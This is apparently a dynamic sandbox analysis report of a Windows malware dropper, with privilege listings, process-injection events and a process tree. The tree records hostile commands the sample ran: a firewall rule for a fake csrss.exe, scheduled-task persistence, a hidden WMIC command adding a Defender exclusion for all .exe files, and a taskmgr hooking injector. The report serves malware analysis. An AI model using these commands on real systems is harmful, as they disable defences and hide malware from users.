Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2156 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2156 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2156 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2156 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2156 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2156 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2156 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2156 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2156 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2156 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2156 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 2468 wrote to memory of 768 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe
PID 2468 wrote to memory of 768 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe
PID 2468 wrote to memory of 768 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe
PID 2468 wrote to memory of 4592 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe
PID 2468 wrote to memory of 4592 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe
PID 2468 wrote to memory of 1756 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe
PID 2468 wrote to memory of 1756 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe
PID 2468 wrote to memory of 1756 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe
PID 2468 wrote to memory of 2164 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe
PID 2468 wrote to memory of 2164 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe
PID 2468 wrote to memory of 2164 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe
PID 1756 wrote to memory of 3936 N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe C:\Windows\System32\Conhost.exe
PID 1756 wrote to memory of 3936 N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe C:\Windows\System32\Conhost.exe
PID 1756 wrote to memory of 3936 N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe C:\Windows\System32\Conhost.exe
PID 2164 wrote to memory of 4936 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 4936 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 4936 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 768 wrote to memory of 1572 N/A C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe C:\Windows\System32\Conhost.exe
PID 768 wrote to memory of 1572 N/A C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe C:\Windows\System32\Conhost.exe
PID 768 wrote to memory of 1572 N/A C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe C:\Windows\System32\Conhost.exe
PID 2468 wrote to memory of 3208 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 2468 wrote to memory of 3208 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 2468 wrote to memory of 3208 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 3748 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 3748 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 3748 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 4504 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 4504 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 4504 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 1164 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 1164 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 3208 wrote to memory of 1164 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 1164 wrote to memory of 1996 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 1164 wrote to memory of 1996 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 1164 wrote to memory of 1996 N/A C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
PID 4364 wrote to memory of 748 N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4364 wrote to memory of 748 N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4364 wrote to memory of 748 N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2108 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2108 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 2108 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4364 wrote to memory of 2672 N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe C:\Windows\System32\Conhost.exe
PID 4364 wrote to memory of 2672 N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe C:\Windows\System32\Conhost.exe
PID 2672 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2672 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4804 wrote to memory of 2484 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\system32\cmd.exe
PID 4804 wrote to memory of 2484 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\system32\cmd.exe
PID 2484 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2484 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4804 wrote to memory of 3596 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 3596 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 3596 N/A C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4364 wrote to memory of 3376 N/A C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe

"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe

"C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe"

C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe

"C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe

"C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe"

C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe

"C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\ulc.0.exe

"C:\Users\Admin\AppData\Local\Temp\ulc.0.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1572 -ip 1572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 1020

C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe

"C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe" --silent --allusers=0

C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe

C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6e68e1d0,0x6e68e1dc,0x6e68e1e8

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe" --version

C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe

"C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe"

C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe

"C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3208 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240419140451" --session-guid=8aaab569-435b-484d-b795-e57cfab4635d --server-tracking-blob="MDA2MDQ4NDdiNTgyZWQ3ZDNiNDY4Y2RjZWQ0YmViOGQ3YTMwYjMwYzZiMDI4NWY4ODYxYThhZGEzNTJiYzgzZDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzNTM1NDgwLjY1MjciLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiY2VjMGJlZDYtMDhhNi00MWU4LWI0OGQtOTMxZDZkOGU3NDExIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C05000000000000

C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe

C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6da0e1d0,0x6da0e1dc,0x6da0e1e8

C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe

"C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x426038,0x426044,0x426050

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\ulc.3.exe

"C:\Users\Admin\AppData\Local\Temp\ulc.3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 768 -ip 768

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 1552

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe

"C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe"

C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe

.\Install.exe /nxdidQZJ "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe\" em /TIsite_iduEE 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe em /TIsite_iduEE 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

